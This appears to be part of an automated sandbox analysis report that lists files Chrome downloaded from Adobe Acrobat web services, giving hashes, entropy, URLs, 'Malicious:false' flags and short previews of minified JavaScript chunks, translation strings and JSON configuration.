                                                      Preview:var Module=void 0!==Module?Module:{};Error.stackTraceLimit=200,self.prejs_time=performance.now(),Error.prepareStackTrace=function(p,g){const f=`${p.name?p.name:""}, ${p.message?p.message:""}`;let A=g.map((function(p){return` at ${p.toString()}`})).join("\n");return A=A.replace(/(data:application\/javascript[^:\n\r]+)/g,"inlined_wasm.js"),`${f}\n${A}`};var moduleOverrides=Object.assign({},Module),arguments_=[],thisProgram="./this.program",quit_=(p,g)=>{throw g},ENVIRONMENT_IS_WEB="object"==typeof window,ENVIRONMENT_IS_WORKER="function"==typeof importScripts,ENVIRONMENT_IS_NODE="object"==typeof process&&"object"==typeof process.versions&&"string"==typeof process.versions.node,scriptDirectory="",read_,readAsync,readBinary;function locateFile(p){return Module.locateFile?Module.locateFile(p,scriptDirectory):scriptDirectory+p}if(ENVIRONMENT_IS_NODE){var fs=require("fs"),nodePath=require("path");scriptDirectory=ENVIRONMENT_IS_WORKER?nodePath.dirname(scriptDirectory)+"/":__dirname+"/",read_
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (4112), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):4114
                                                      Entropy (8bit):5.30116764203578
                                                      Encrypted:false
                                                      SSDEEP:96:A44aEVHfVCX02myHey+Cmi22VhfA9gKTVfcdmZj98RQeL8tQ:A4iAX02myHtSi22Hf4gKTROmZjuG68tQ
                                                      MD5:0469B2578169B1AC7C3E5C053DD41047
                                                      SHA1:6828517F09D5C513D1F2EA552E3ED4CF69812708
                                                      SHA-256:531C647E2CB21D1CA4DD7FEFEEB7CA65DDC1C73F9747500B1ACE50C103E1E9E8
                                                      SHA-512:148951170E0F162B258C5880CC44A0DB111E8DB3B6A174583106D1FC091B3CE0B5BFFAD567E30948B69A141D9D9D12912B781254E45FF938A983AE5BD8807923
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-files-dropin/3.18.0_2.64.0/translations-en-US-json-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-files"]=self["webpackJsonp-files"]||[]).push([[818],{t39f:e=>{e.exports=JSON.parse('{"ADD_FILE_FROM_DEVICE":"Add a file from your device","ADD_TO_STARRED":"Add to Starred","ADDED":"Added","CANCEL":"Cancel","CANCELED":"Canceled","CREATE_COPY":"Create a copy","CREATE_COPY_TITLE":"Create a copy to modify","CREATE_COPY_DESCRIPTION":"Shared files can.t be modified. Create a copy and make changes to your copy","CONTINUE":"Continue","CREATE":"Create","DATE_ADDED":"Date Added","DATE_MODIFIED":"Date Modified","DATE_OPENED":"Date Opened","DRAG_AND_DROP_FILE":"Drag and drop your file","DRAG_AND_DROP_FILES":"Drag and drop your files","DRAG_OR_UPLOAD":"Drag or upload files here to add them to this folder.","DRAG_OR_UPLOAD_TO_USE":"Drag or upload files here to work with and share your files across web, desktop and mobile.","DUPLICATE_FOLDER":"A folder with this name already exists. Please choose another name.","EMPTY_FOLDER":"There aren\'t any files here yet.","ERR
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (32058), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):32102
                                                      Entropy (8bit):4.789329601519955
                                                      Encrypted:false
                                                      SSDEEP:768:TWUGWonnnIouMZ34o8kAohpCgBCEa7+dSfaao+70lk+EENAJyRfLF:T6FnnnIouMF4oEoOgBM7P0DF
                                                      MD5:E54BEA065E4CD70FD979A1144A78B7B8
                                                      SHA1:1D7BDA127213670BFA9C7999DB4ED226FE5DB57B
                                                      SHA-256:42F8A44128AB694A503DBF9CF294D9603C11E9F5DA27BC20BC82185BF378256B
                                                      SHA-512:A0842D7A5F73845AB7F600976B18934E9E1EBB281670AF46C813F8CB175A7660ECB435452013C5BFE04F12A22F8456BFD17C3707AF527FB783A5ECCE671FFD57
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-global-nav-dropin/3.58.0_3.582.0/translations-en-US-json-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-global-nav"]=self["webpackJsonp-global-nav"]||[]).push([[818],{t39f:e=>{e.exports=JSON.parse('{"global_nav.default_branding_ui2":"Adobe Acrobat","global_nav.default_branding_ui2_aria_label":"Adobe Acrobat Logo - Home","help_menu.get_help":"Get help","help_menu.hands_on_tutorial":"Hands-on tutorial","help_menu.share_feedback":"Share feedback","help_menu.restart_tour":"Restart tour","help_menu.about_document_cloud":"Legal notices","help_menu.post_suggestion_message_placeholder":"How can we improve this product experience?","help_menu.post_suggestion_title":"Share in our feedback forum","help_menu.uv_legal":"Your feedback will be collected via UserVoice, a trusted partner service not operated by Adobe.","help_menu.uv_learn_more":"Learn more.","profile_menu.settings":"Settings","profile_menu.my_plan":"My plan","profile_menu.see_plans":"See plans","profile_menu.invite_team_members":"Assign user licenses ({unassignedLicenses} unassigned)","profile_menu.buy_mo
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):174801
                                                      Entropy (8bit):5.490406707271644
                                                      Encrypted:false
                                                      SSDEEP:3072:lFq8Lgw6fR1Zez9pze/3N0TC7rA2nhM+p/ZdNzd1A0g:lFq8LUZ1Z0Q3bdfg
                                                      MD5:1F58287BEE8BFF620F2FF25983463C29
                                                      SHA1:71B83869ACA42180E1D039D871E1E13E2A49D50F
                                                      SHA-256:6841CD2CEF8CEEFEC1AE1CCBBF0F362B11F84DBE1A1BEC49988EAD8453165B89
                                                      SHA-512:0012993A5CE34EE8C4DFEE35A6630DB87D4DBD08F2287CE3E758595BC2CD3F490B8E244419787E282F60B6246E1129ED905262639498BC231B42437386EB8818
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/fs2QTverbs0-chunk.js
                                                      Preview:(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[2533],{"+ERq":(e,t,r)=>{"use strict";var n=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},o=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(r("YWiy"));t.A=function(e){var t=e.fill,r=void 0===t?"currentColor":t,a=e.width,i=void 0===a?24:a,s=e.height,l=void 0===s?24:s,c=e.style,u=void 0===c?{}:c,p=function _objectWithoutProperties(e,t){var r={};for(var n in e)t.indexOf(n)>=0||Object.prototype.hasOwnProperty.call(e,n)&&(r[n]=e[n]);return r}(e,["fill","width","height","style"]);return o.default.createElement("svg",n({viewBox:"0 0 24 24",style:n({fill:r,width:i,height:l},u)},p),o.default.createElement("path",{d:"M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"}))}},Di0q:(e,t,r)=>{"use strict";var n=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var r=argum
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65468)
                                                      Category:downloaded
                                                      Size (bytes):225189
                                                      Entropy (8bit):5.321229941267026
                                                      Encrypted:false
                                                      SSDEEP:3072:MXauLAyCsyQepNXQYb+SP2SM4SsZoumQdB2skKzLh+YJF2eN609IqTUhUb01:MXauLAyCsyQefg7SM4Ss+YJF2e59r01
                                                      MD5:7C25A9C7D8A9FF98A53BAC7FCA0A2C96
                                                      SHA1:297E6D41021DE84093C6A70C4572C9FD91C59CC4
                                                      SHA-256:E875C6F6C85DC1AC65BD0CCA7C074E502321ECE5ED858BA852C35A03161537DA
                                                      SHA-512:6069A06691046B31E7245EBB8932B212A42AC11534493810B136C62AD493DA933D21A1746285BD842344325034014D2D136E6452B45757C6F70A35E8E9FC013F
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/5508-chunk.js
                                                      Preview:/*! For license information please see 5508-chunk.js.LICENSE.txt */.(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[5508],{snUT:(e,t,n)=>{"use strict";t.t=function A4uClose(e){var t=_extends({},e);return r.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),r.default.createElement("path",{fillRule:"evenodd",d:"M26.48528,6.68629,18,15.17157,9.51472,6.68629a1,1,0,0,0-1.41421,0L6.68629,8.10051a1,1,0,0,0,0,1.41421L15.17157,18,6.68629,26.48528a1,1,0,0,0,0,1.41421l1.41422,1.41422a1,1,0,0,0,1.41421,0L18,20.82843l8.48528,8.48528a1,1,0,0,0,1.41421,0l1.41422-1.41422a1,1,0,0,0,0-1.41421L20.82843,18l8.48528-8.48528a1,1,0,0,0,0-1.41421L27.89949,6.68629A1,1,0,0,0,26.48528,6.68629Z"}))};var r=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(n("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65462)
                                                      Category:downloaded
                                                      Size (bytes):79096
                                                      Entropy (8bit):5.258341042706319
                                                      Encrypted:false
                                                      SSDEEP:768:9SQBlsmupzOylnNCalqhgT1i8oyLypKjooCINQdhgTZG19IZPqN7I+SgdhgTZ7ms:AWlsZzPlD/wtyLH7Dg1CI2zBmODQ6
                                                      MD5:1A2BF03DF62DA46178288ED9219FCC4A
                                                      SHA1:2EB7541A13002C98977B6E3C003447691776CBA7
                                                      SHA-256:62D65C4B629E38D321C234FA2AD206F01312C04FD8D12DBA99BE314DF8E53830
                                                      SHA-512:152913087A81C9900525D3122F8F04A0908CF091CB9D55E42D7A0362C8692A8841D0A8302E37D80F459BE20FF07B048B82187766BFA89256707FE6C28CA693D8
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-viewer-dropin/3.62.0_1.1382.0/cnpdfUtils-chunk.js
                                                      Preview:/*! For license information please see cnpdfUtils-chunk.js.LICENSE.txt */.(self["webpackJsonp-viewer"]=self["webpackJsonp-viewer"]||[]).push([[1454],{"1OO/":r=>{(()=>{"use strict";var C,W,at={60:(r,C,W)=>{W.d(C,{Dh:()=>c,Ee:()=>h,NC:()=>u,OR:()=>o,SK:()=>f,UD:()=>i,dK:()=>a,qJ:()=>p,rN:()=>s,vJ:()=>l});var at=W(832);function o(r){var C,W=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},at=arguments.length>2&&void 0!==arguments[2]?arguments[2]:"",it=!(arguments.length>3&&void 0!==arguments[3])||arguments[3],ct=W.childCb,st=W.componentCb,ut=r.components,lt=r.children,ht=r.path;C=ht?"".concat(at,"/").concat(ht):"".concat(at);var h=function(r){return r&&"function"==typeof r};Array.isArray(ut)&&h(st)&&ut.forEach((function(r){var W="".concat(C,"/").concat(r.path);st({component:r,absolutePath:W})})),Array.isArray(lt)&&lt.forEach((function(r){if(h(ct)){var at="".concat(C,"/").concat(r.path);ct({child:r,absolutePath:at})}it&&o(r,W,C,it)}))}function i(r,C){o(r,{componentCb:C},arguments.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (1319)
                                                      Category:downloaded
                                                      Size (bytes):1366
                                                      Entropy (8bit):5.621037478519123
                                                      Encrypted:false
                                                      SSDEEP:24:cgqHHVvCbknBbsonBWN4yHHVvCoRwFRDRICka0cR0ScjpsiGowaE5OV:hWkYBrBWNrkuw61V5V
                                                      MD5:FC431F9016BD814C5CBC21BA363CDF30
                                                      SHA1:94A54043693DE140C69F5D362BB23C3B3BBB6EDD
                                                      SHA-256:6E5C62AF0D07C82D44C5729898DE343765C0DB7338C75F3481D6E44236ED031D
                                                      SHA-512:5CC9B28D430C4C4607A4FB0079BF5922B97A988B7580A341A6AEC2C5F63932251F1009E6948D0B9AD031B98C546E36A241D8025023E5701FF888CB4E314646A8
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-home2-dropin/3.52.0_2.1347.0/4960-chunk.js
                                                      Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},l=(new e.Error).stack;l&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[l]="27a55581-6898-4497-b3f6-828903d95e77",e._sentryDebugIdIdentifier="sentry-dbid-27a55581-6898-4497-b3f6-828903d95e77")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"83b9488d5bb7830d24a07d05c562ad0e9ff36b58"},(self["webpackJsonp-home2"]=self["webpackJsonp-home2"]||[]).push([[4960],{MkiW:(e,l,n)=>{var d=n("YWiy");function SDCDiscover18N(e){return d.createElement("svg",e,d.createElement("g",null,[d.createElement("path",{d:"M9,17.25A8.25,8.25,0,1,1,17.25,9,8.25,8.25,0,0,1,9,17.25Zm0-15A6.75,6.75,0,1,0,15.75,9,6.75,6.75,0,0,0,9,2.25Z",fill:"var(--iconFill, #464646)",key:0}),d.createElement("path",{d:"M10.86969,7.27942a.25.25,0,0,0-.16663-.1626L5.892,5.68787a.25.25,0,0,0-.30859.3
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):92
                                                      Entropy (8bit):4.5649306741469164
                                                      Encrypted:false
                                                      SSDEEP:3:YRMOSXist4bLdiKBAHfuJvAE1sypZHYn:YT8wLQaifuJvGyHY
                                                      MD5:1FABB82EF644B3470425DFD3167532E8
                                                      SHA1:3EBFBEA88288DF36010F5F844D2C54A91500597F
                                                      SHA-256:D210F85CADBADBD89EE845F2BB81220CA313F2B402E7973604E2EA7B546E82F8
                                                      SHA-512:FC5A0825828D960CF317F3F5C6C64E0900BA055618FE68C96633E05C081432D6EA6A96DD7F17EC61BEF547013E1B0E0B8E2E274B6C11EF8A131E178A075F03B7
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:{"title":"ErrMissingAPIKey","status":403,"error_code":403000,"message":"API key is missing"}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (2707)
                                                      Category:downloaded
                                                      Size (bytes):2765
                                                      Entropy (8bit):5.275520409999734
                                                      Encrypted:false
                                                      SSDEEP:48:Al1j+7BMYS8+kMjwpu1BptBB3tSj1GM21B+1Bk1B9PCGFB6RU9F9SDgx1BaAgG1y:Aj+7m98+kMjwY7jn9Sj1GM27+7k75CG+
                                                      MD5:07D575EE50FE9640F0FA0A6A91CC1865
                                                      SHA1:238A653CF1E6AB9843D4D4EED992F6A60F67D1DF
                                                      SHA-256:349C900F2325B59A3A280AD37153B0E8CA2C05FB800F48D42D7054F81D7D04EA
                                                      SHA-512:FFA945698C73D0D389FDF02C8C874A68C432FF4936FA5B700136AAFF82A0B3CC5138413386E1E903F1BE54C6F59DA75FD65358E082D6D5FDFE940F3F77109BAF
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dcpreviewdropin/3.46.1_2.1133.0/previewProvider-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-preview"]=self["webpackJsonp-preview"]||[]).push([[4971],{Ehmy:(e,t,i)=>{i.r(t),i.d(t,{default:()=>o,getRenditionProvider:()=>getRenditionProvider});var r=i("plsW"),n=i("bzSf"),s=i("kbXN");const getRenditionProvider=()=>r.providers.rendition(null);const o=class PreviewProvider{constructor(){this.renditionPromise=getRenditionProvider(),this.bufferPromise=null,this.cnpdfFetcherPromise=null,this.openDocumentResult=null,this.mimeType,this.commonDocOpenParams={assetType:"/external",password:"",includeActions:!0,forceCacheless:!1,useAJS:!0,useDCAPI:!1,enableExternal:!1,enableLinearization:!1,shouldUseModernViewer:!0,linearizationBlockSize:65536,storePDFHash:!1}}ready(){return this}init(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{};e.bufferPromise&&(this.bufferPromise=e.bufferPromise),e.cnpdfFetcherPromise&&(this.cnpdfFetcherPromise=e.cnpdfFetcherPromise)}invokeOpenPDF(e){return!(0,n.BE)()&&this.bufferPromise?((0,n.bZ)("providerOpenPDFStart
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:downloaded
                                                      Size (bytes):19797
                                                      Entropy (8bit):4.783900040226016
                                                      Encrypted:false
                                                      SSDEEP:192:KZ/ImP+n1M7IP/L/Z/AmPa/NYIbPO/i/s:48
                                                      MD5:0FDEFB4853B86E6BAA6D67AD892BF871
                                                      SHA1:3EE5C479C32567736AAB3E030AF2D155CDF7647E
                                                      SHA-256:614A071ACAB52FCC803B848AA7D82D659227CCDADF898412D5217787368FAA35
                                                      SHA-512:0CF2871D2DA4617CBE8E277C210FD31D02D8B15E252A1DF2BA0DBA241FB7C73AA5425FDA55EFCE1CC63546E358C9160DAF13C2F22AD705C140C6801CD81CBAF2
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://dcdiscovery.adobe.io/index
                                                      Preview:{"expiry":1742394038,"services":{"gen_ai_editor_service":{"resources":{"operations":{"predict":{"http_method":"POST","uri":"{+base_uri}/services/v2/predict","authentication":["auth_header_primary"],"accept":{"updated_text":{"application_ndjson_v1":"application/x-ndjson","application_json_v1":"application/json"}},"resource_parameter":{"name":"base_uri","default":"https://senseicore.adobe.io","type":"string","required":true},"form_data_parameters":[{"name":"service_id","default":"sensei:Feature:autocrop:Service-392ebc4b9147491da34c3694b04f52a8","type":"string","required":true}]},"predict_cancel":{"http_method":"POST","uri":"{+base_uri}/services/v2/cancel/{+request_id}","authentication":["auth_header_primary"],"resource_parameter":{"default":"https://senseicore.adobe.io","name":"base_uri","type":"string","required":true},"uri_parameters":[{"name":"request_id","type":"string"}],"accept":{"application_json_v1":"application/json"}}}}},"generate_thought_partner":{"resources":{"operations":{"p
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:downloaded
                                                      Size (bytes):7620
                                                      Entropy (8bit):4.793638047978028
                                                      Encrypted:false
                                                      SSDEEP:96:GD1ZPbZPdmu1PCW9Pk874L7YMCG/ASbj8wyGss5WWygpTPpQB3FV1/QLekv:JdL7YMv89Zs5W5gp2mz
                                                      MD5:526CF6DBEEA2AA8C0822C3C766484ED5
                                                      SHA1:0876D5BC692F0C5F59D2CD38993083CEE4B110C8
                                                      SHA-256:33604B7E1A79541A66E3EEA227FF528E4DD364D92BF02BAE16579705D41AA1AC
                                                      SHA-512:0567EF992CED931FD66B858AF0DEDC5543CE2BA84334420548C9F0043A1D0871988AA9A57AEF8EA1EC480496CDEE63344C66AF1309E4FE1CF56B8CC1A133EA10
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://p13n.adobe.io/fg/api/v3/feature?clientId=dc-prod-virgoweb&meta=false
                                                      Preview:{"analyticsVersion":"2.0","api_version":"0.1","json_version":"0.1","ttl":60,"caching_enabled":false,"client_analytics_params":{"app_id":44,"safe_event_required":false,"analytics_required":false},"releases":[{"bit_index":450,"release_name":"dc-share-frictionless-panel","features":["dc-share-frictionless-imagetopdf-panel"],"release_analytics_params":[{"app_id":44,"release_id":290,"bit_index":450,"variant_id":10001789,"feature_id":-1,"analytics_required":true,"event_id":"16f489e9-a079-42ca-9ff6-697990716e52"}]},{"bit_index":1272,"release_name":"dc-fs2-sign-label","features":["fs2-sign-label-sign"],"release_analytics_params":[{"app_id":44,"release_id":1112,"bit_index":1272,"variant_id":10010465,"feature_id":-1,"analytics_required":true,"event_id":"4b945ea3-a864-41ca-a5dd-b6be79d7d8e2"}]},{"bit_index":1770,"release_name":"dc-web-ftes-on","features":[],"release_analytics_params":[{"app_id":44,"release_id":1610,"bit_index":1770,"variant_id":0,"feature_id":-1,"analytics_required":true,"event_i
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65469)
                                                      Category:downloaded
                                                      Size (bytes):502764
                                                      Entropy (8bit):5.46564977549327
                                                      Encrypted:false
                                                      SSDEEP:6144:6mle81/7eLUmczVuSe6leeMLqgJeGQRSX9nfCtcJM+j4lWlbFaAYFoM5FoFzoGRj:6oKsVBMZYsM+jxrPR2oPOhTXCP5bll
                                                      MD5:AC2806262792997DA0F30B19C8FFC89A
                                                      SHA1:2B770EF4722F040FB2B295E3F64E475006C2E33E
                                                      SHA-256:A022F2BB037FDEFB9733EA85D8003A79A0B6EC0D03E765A5F180B332C707CB7A
                                                      SHA-512:DC4E2EDC638B0322A859D8352B4625978ADC4F414F24404441C43D968587148C293541C3C0D838060E4EEEA33D32DC6D5B910C8EFA56F2711E3F4A5473781083
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-review-dropin/3.21.0_2.323.0/bootstrap.js
                                                      Preview:/*! For license information please see bootstrap.js.LICENSE.txt */.(()=>{var e,t,n,r,o={"eb+9":(e,t,n)=>{e.exports=n("YQ4W")},YQ4W:(e,t,n)=>{"use strict";var r=n("AAps");Object.defineProperty(t,"__esModule",{value:!0}),t.default=Avatar;var o=r(n("z3HK")),s=r(n("jp00")),a=r(n("PZ3W")),c=r(n("e1tA")),l=r(n("/hLX")),d=r(n("YWiy"));function Avatar(e){var t=e.src,n=e.alt,r=e.disabled,l=e.className,p=(0,s.default)(e,["src","alt","disabled","className"]);return l=(0,a.default)("spectrum-Avatar",{"is-disabled":r},l),d.default.createElement("img",(0,o.default)({},(0,c.default)(p),{src:t,alt:n,className:l}))}n("9qVO"),n("VnGV"),n("UGQT"),Avatar.propTypes={src:l.default.string,alt:l.default.string,disabled:l.default.bool,className:l.default.string},Avatar.defaultProps={alt:""}},l4jU:(e,t,n)=>{"use strict";var r=n("AAps"),o=n("h6PR");t.A=void 0;var s,a,c,l=r(n("z3HK")),d=r(n("jp00")),p=r(n("QNma")),u=r(n("vPca")),h=r(n("khqL")),v=r(n("qavZ")),m=r(n("qJYQ")),_=r(n("i44B")),g=r(n("uqI5")),w=r(n("/hL
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text
                                                      Category:downloaded
                                                      Size (bytes):240
                                                      Entropy (8bit):5.413764517612778
                                                      Encrypted:false
                                                      SSDEEP:6:+aH61rm4EnKI59dFRFuHkG+hB/7bnlguVV:+aH61mmedRFA+hBXnlguVV
                                                      MD5:3456332B1A44D669D859745663906C24
                                                      SHA1:060B943A8B50BB823F142509FFC44A992A1DD73C
                                                      SHA-256:C1812F3A4E1799C9B12D3E5C04B02A2A39CF9DFE684443F88947087A3B50589E
                                                      SHA-512:988CDB0FD2905D1F63F57F5FF0FEF3635212315CD6BFA7B3BC373D1739ED5687DF8328E7592EBB2DBA4E13F73FA344C84189B7314CFC74EDE73C0905A569FAD1
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1089.0/5610-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[5610],{jWsh:(e,s,c)=>{c.r(s),c.d(s,{default:()=>d});const d=c.p+"bd7c846d5d6adfeedd6d1ec2b254b0c0.gif"}}]);.//# sourceMappingURL=private/5610-chunk.js.map
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (4054)
                                                      Category:downloaded
                                                      Size (bytes):4094
                                                      Entropy (8bit):5.21009529808194
                                                      Encrypted:false
                                                      SSDEEP:96:2YejMXyXUbOdRrbmSpOKHAnrnCxfc+Wd7j7mcJgCsABYLVlFt:3ejMEdDfAnLCxnWd37mcJaAut
                                                      MD5:DDD66269A6EC0ED8EB419BC5671C3C5E
                                                      SHA1:DE823C0984BB132780C9265619628406644D74C9
                                                      SHA-256:B0AE27FB87ABBB6E9B823318C29E423364AF0CAD0E546A7DDB73786B3BFEFFF0
                                                      SHA-512:B5366A9895DAAD4473AB355DF2449E6D75725F2BB1AC642A2F39E2BE3A35A2FF40E73DC0C14830A414B7DB1BEBA3E8ECF5B0FF24DE58F44D8D2615CB6220055F
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-web-app-dropin/3.18.0_2.208.0/282.js
                                                      Preview:(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[282],{W61N:(e,i,o)=>{"use strict";o.r(i),o.d(i,{default:()=>y});var t=o("YWiy"),r=o("abd3"),s=o("VjBA"),n=o("/hLX"),l=o.n(n),a=o("plsW"),d=o("5InX"),p=o.n(d);const c=a.logging.getLogger("ModalDialog");class ModalDialog extends t.Component{constructor(e){super(e),this.show=()=>{const e=this.props.dropinCls;if(e&&!this.modalKey){var i;const o=this.props.location,r=a.router.getQueryParams(o.search)["dialog!dropin"];r&&"string"==typeof r&&(null===(i=a.envUtil.getEnvVar("dialog-dropins"))||void 0===i?void 0:i.includes(r))?(c.emit("RSP dialog",{type:"RSP v3"}),a.discovery.loadDropinClass("modal-container").then((i=>{let{ModalContainerAPI:o}=i;this.modalKey||(this.modalKey=o.show(t.createElement(e,{inModalContainer:!0,onClose:this.onClose})),this.modalType="v3")}))):(c.emit("RSP dialog",{type:"RSP v2"}),this.modalKey=p().show(t.createElement(e,{inModalContainer:!0,onClose:this.onClose})),this.modalType="v2")}},this.hide=()
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (20739), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):20742
                                                      Entropy (8bit):4.9130970653848305
                                                      Encrypted:false
                                                      SSDEEP:384:VZ43rqoFmiWYpn+GFPaLy+eq0zgzczY/iE01U1ae/zJIWbYgdSeZ97T4N:PQxFmrY13+vBAozxR/+CvceZZ4N
                                                      MD5:02200E202DDE15D4F9A97DBBAD328507
                                                      SHA1:0C6C52F71E2FC243A76391B458073FAF58CB24D6
                                                      SHA-256:3906B16B1D613AEE79688B3F24DAEF301D5E6971EC328311C2B2157A44B682AA
                                                      SHA-512:55A084A6E9D0E5D36F01F60843C2DEA939FD1CEE286752F6B08179DC12BE9F0FA15257437B6935F7D65BC185F5BDCF914E3097E843BC73A2E4221110091FB43F
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-review-dropin/3.21.0_2.323.0/translations-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-review"]=self["webpackJsonp-review"]||[]).push([[1543],{t39f:e=>{e.exports=JSON.parse('{"startReview":"Start reviewing","sendSharedDocument":"{ other } shared this link","entryDialogTitle":"{ other } has shared a document with you","receiveUpdate":"Continue to add your own, or reply to other people\'s comments. Others will see your profile name and photo.","onSendContinueClick":"Do you want to add this link to your Recent Files list and share your profile name and photo with the sender?","sendNotifyAndViewProfilePermission":" { other } will be notified that you have viewed the document and will be able to see your profile.","signInDifferent":"Sign in as different user","skip":"Skip","signInAdobe":"Sign In with Adobe ID","initiator":"INITIATOR","opened":"opened","finished":"Finished","not_opened":"Not opened","okay":"Ok","openInAcrobatDesktop":"Open In desktop app","lastCommented":"Last accessed, ","maxReviewerCountText":"The maximum number of people hav
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), CFF, length 38948, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):38948
                                                      Entropy (8bit):7.992760264211827
                                                      Encrypted:true
                                                      SSDEEP:768:UTJu1Z//32tOHG/deDy0QOfaAF5x5Zk2aqgBQ0OW0xE:V32EG6QOfR58GltxE
                                                      MD5:8CF9CE13F6FE0205F4EAAC49FA17B681
                                                      SHA1:2CEF6CD00A2D4A5CD5E0AB6F00042A70F1B73756
                                                      SHA-256:85257E2624BBB138582821CEB2F8B18C7B4FB43D26C1BCBFD5155CA81B55CC69
                                                      SHA-512:7F646C7CA915C77F92FF0D3DB97DF62379597D2348A43188B117076939D1A0FA2F6A7D2C1F20D608A5161A5AC0010789CAF43E893FC06437B302C6BDC1D4A77B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://use.typekit.net/af/eaf09c/000000000000000000017703/27/l?primer=0635fba006f1437d962ae878ad04a353e0c3568e4d5bde3554eb7e3e05ddd02d&fvd=n7&v=3
